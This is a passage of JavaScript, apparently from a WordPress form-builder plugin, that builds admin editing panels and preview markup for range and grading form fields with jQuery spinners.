	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");	
    var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");				
	

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
	
				
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";	  
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";	 	
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
    var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";	 
    var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	
	var el_label_label = document.createElement('label');
	                el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
	        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
		el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
	Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
		
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
	Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

				
	var el_range_width_label = document.createElement('label');
				el_range_width_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_range_width_label.innerHTML = "Width ";
	
	var el_range_width_input = document.createElement('input');
                el_range_width_input.setAttribute("type", "text");		
                el_range_width_input.setAttribute("id", "edit_for_spinner_width");		
                el_range_width_input.setAttribute("value", w_field_range_width);
                el_range_width_input.style.cssText = "width:100px;";	
				el_range_width_input.setAttribute("onKeyPress", "return check_isnum(event)");	
			    el_range_width_input.setAttribute("onKeyUp", "change_range_width(this.value,"+i+",'form_id_temp')");			
				

	var el_range_step_label = document.createElement('label');
	        el_range_step_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_range_step_label.innerHTML = "Step";
		
		var el_range_step_input = document.createElement('input');
                el_range_step_input.setAttribute("type", "text");		
                el_range_step_input.setAttribute("id", "edit_for_spinner_step");		
                el_range_step_input.setAttribute("value", w_field_range_step);
                el_range_step_input.style.cssText = "width:100px;";	
				el_range_step_input.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
			    el_range_step_input.setAttribute("onChange", "change_range_step(this.value,"+i+",'form_id_temp')");
	
    
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_range')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_range')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_range')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_range')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	
	edit_main_td3.appendChild(el_range_width_label);
	edit_main_td3_1.appendChild(el_range_width_input);
	
	edit_main_td4.appendChild(el_range_step_label);	
	edit_main_td4_1.appendChild(el_range_step_input);
	
	
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br1);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	
	
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
    edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	

	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_range');
	
//show table

	
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_range");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
		
	var adding_width= document.createElement("input");
            adding_width.setAttribute("type", "hidden");
            adding_width.setAttribute("value", w_field_range_width);
            adding_width.setAttribute("name", i+"_range_widthform_id_temp");	
            adding_width.setAttribute("id", i+"_range_widthform_id_temp");		
			
		
	var adding_step = document.createElement("input");
            adding_step.setAttribute("type", "hidden");
            adding_step.setAttribute("value", w_field_range_step);
            adding_step.setAttribute("name", i+"_range_stepform_id_temp");	
            adding_step.setAttribute("id", i+"_range_stepform_id_temp");

	  
		
    var adding_range_input_from = document.createElement("input");
            adding_range_input_from.setAttribute("type", "");
            adding_range_input_from.setAttribute("value",'');
			adding_range_input_from.style.cssText="width:"+w_field_range_width+"px"; 
            adding_range_input_from.setAttribute("name", i+"_elementform_id_temp0");	
            adding_range_input_from.setAttribute("id", i+"_elementform_id_temp0");
			adding_range_input_from.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
			
    var adding_range_input_to = document.createElement("input");
            adding_range_input_to.setAttribute("type", "");
            adding_range_input_to.setAttribute("value",'');
			adding_range_input_to.style.cssText="width:"+w_field_range_width+"px"; 
            adding_range_input_to.setAttribute("name", i+"_elementform_id_temp1");	
            adding_range_input_to.setAttribute("id", i+"_elementform_id_temp1");
			adding_range_input_to.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
			
	var adding_range_label_from = document.createElement("label");
          
      adding_range_label_from.setAttribute("class", "mini_label");
			adding_range_label_from.setAttribute("id", i+"_mini_label_from");
			adding_range_label_from.innerHTML=w_mini_labels[0];
          	
			

	var adding_range_label_to = document.createElement("label");
         
		  adding_range_label_to.setAttribute("class", "mini_label");	
			adding_range_label_to.setAttribute("id", i+"_mini_label_to");
			adding_range_label_to.innerHTML=w_mini_labels[1];
          	
          
			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
		
		var div_for_editable_labels = document.createElement('div');
			div_for_editable_labels.setAttribute("style", "margin-left:4px; color:red;");
			
      	edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");

		div_for_editable_labels.appendChild(edit_labels);  
		
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

		var table_little = document.createElement('table');
           	table_little.setAttribute("id", i+"_elemet_table_littleform_id_temp");
			
      	var tr1 = document.createElement('tr');
		var tr2 = document.createElement('tr');
			
      	var td1_1 = document.createElement('td');
         	td1_1.setAttribute("valign", 'middle');
         	td1_1.setAttribute("align", 'left');
          
			
		var td1_2 = document.createElement('td');
         	td1_2.setAttribute("valign", 'middle');
         	td1_2.setAttribute("align", 'left');
           
			
      	var td2_1 = document.createElement('td');
        	td2_1.setAttribute("valign", 'top');
         	td2_1.setAttribute("align", 'left');
           
		var td2_2 = document.createElement('td');
        	td2_2.setAttribute("valign", 'top');
         	td2_2.setAttribute("align", 'left');
           	
		  var br1 = document.createElement('br');

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required );
      	td2.appendChild(adding_type);
      	td2.appendChild(adding_required);
		td2.appendChild(adding_width);
		td2.appendChild(adding_step);
	    
		td1_1.appendChild(adding_range_input_from);
		td1_2.appendChild(adding_range_input_to);
		td2_1.appendChild(adding_range_label_from);
		td2_2.appendChild(adding_range_label_to);
 	
	    tr1.appendChild(td1_1);
		tr1.appendChild(td1_2);
		tr2.appendChild(td2_1);
		tr2.appendChild(td2_2);
		
		table_little.appendChild(tr1);
		table_little.appendChild(tr2);
		
		td2.appendChild(table_little);
		
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br1);
		div.appendChild(div_for_editable_labels);
	
      	main_td.appendChild(div);
	if (w_field_label_pos=="top") {
    label_top(i);
  }
  change_class(w_class, i);
  refresh_attr(i, 'type_range');

jQuery( "#"+i+"_elementform_id_temp0" ).spinner();
 var spinner1 = jQuery( "#"+i+"_elementform_id_temp0" ).spinner();

spinner1.spinner( "value", w_field_value1 );
jQuery( "#"+i+"_elementform_id_temp0" ).spinner({ step: w_field_range_step});


jQuery( "#"+i+"_elementform_id_temp1" ).spinner();
var spinner2 = jQuery( "#"+i+"_elementform_id_temp1" ).spinner();
spinner2.spinner( "value", w_field_value2 );
jQuery( "#"+i+"_elementform_id_temp1" ).spinner({ step: w_field_range_step});

jQuery(document).ready(function() {	
	jQuery("label#"+i+"_mini_label_from").click(function() {
		if (jQuery(this).children('input').length == 0) {				
			var form = "<input type='text' class='form' size='8' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(form);							
				jQuery("input.form").focus();			
				jQuery("input.form").blur(function() {
			var value = jQuery(this).val();
		jQuery("#"+i+"_mini_label_from").text(value);
		});
	}
	});

	jQuery("label#"+i+"_mini_label_to").click(function() {
	if (jQuery(this).children('input').length == 0) {		
		var to = "<input type='text' class='to' size='8' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
			jQuery(this).html(to);			
			jQuery("input.to").focus();					
			jQuery("input.to").blur(function() {			
			var value = jQuery(this).val();			
			jQuery("#"+i+"_mini_label_to").text(value);
		});
	}
	});
	});
}


function change_range_width(a,b,form_id){
document.getElementById( b+"_elementform_id_temp0" ).style.cssText="width:"+a+"px";
document.getElementById( b+"_elementform_id_temp1" ).style.cssText="width:"+a+"px";
document.getElementById( b+"_range_widthform_id_temp" ).value=a;
}

function change_range_step(a,b,form_id){
jQuery( "#"+b+"_elementform_id_temp0" ).spinner({ step: a});
jQuery( "#"+b+"_elementform_id_temp1" ).spinner({ step: a});
document.getElementById( b+"_range_stepform_id_temp" ).value=a;


}


function type_grading(i, w_field_label, w_field_label_pos, w_items, w_total, w_required, w_class, w_attr_name, w_attr_value) {

	document.getElementById("element_type").value="type_grading";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black; padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

    var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
		
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px ";

		
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px; vertical-align:top" ; 	
		edit_main_td4.setAttribute("id", "items");
		
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px; vertical-align:top";
     
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
		edit_main_td5.setAttribute("id", "columns");
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px;  ";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px;  ";
	
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
		
		
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
			
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");
	
	var el_total_label = document.createElement('label');
	        el_total_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_total_label.innerHTML = "Total";
	
	var el_total_input = document.createElement('input');
                el_total_input.setAttribute("id", "element_total");
		        el_total_input.setAttribute("type", "text");
 	           	el_total_input.setAttribute("value", w_total);
                el_total_input.style.cssText = "width:200px;";
				el_total_input.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
                el_total_input.setAttribute("onKeyUp", "change_total(this.value,'"+i+"')");
	
	
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
				
				

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
		
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_grading')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_grading')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_grading')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_grading')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var el_items_label = document.createElement('label');
			        el_items_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_items_label.innerHTML = "Items ";
	var el_items_add = document.createElement('img');
                el_items_add.setAttribute("id", "el_items_add");
           		el_items_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_items_add.style.cssText = 'cursor:pointer;';
            	el_items_add.setAttribute("title", 'add');
                el_items_add.setAttribute("onClick", "add_grading_items("+i+")");
				
		
	
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);

    edit_main_td3.appendChild(el_total_label);
	edit_main_td3_1.appendChild(el_total_input);
		
	edit_main_td4.appendChild(el_items_label);
	edit_main_td4_1.appendChild(el_items_add);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	

	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	

	
	n=w_items.length;
	for(k=0; k<n; k++)
	{	
		var br = document.createElement('br');
			br.setAttribute("id", "britems"+k);
			
		var el_items = document.createElement('input');
			el_items.setAttribute("id", "el_items"+k);
			el_items.setAttribute("type", "text");
			el_items.setAttribute("value", w_items[k]);
			el_items.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
			el_items.setAttribute("onKeyUp", "change_label('"+i+"_label_elementform_id_temp"+k+"', this.value); change_in_value('"+i+"_label_elementform_id_temp"+k+"', this.value)");
	
		var el_items_remove = document.createElement('img');
			el_items_remove.setAttribute("id", "el_items"+k+"_remove");
			el_items_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');		
			el_items_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_items_remove.setAttribute("align", 'top');
			el_items_remove.setAttribute("onClick", "remove_grading_items("+k+","+i+")");
			
		edit_main_td4.appendChild(br);
		edit_main_td4.appendChild(el_items);
		edit_main_td4.appendChild(el_items_remove);
	
	}
	


	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
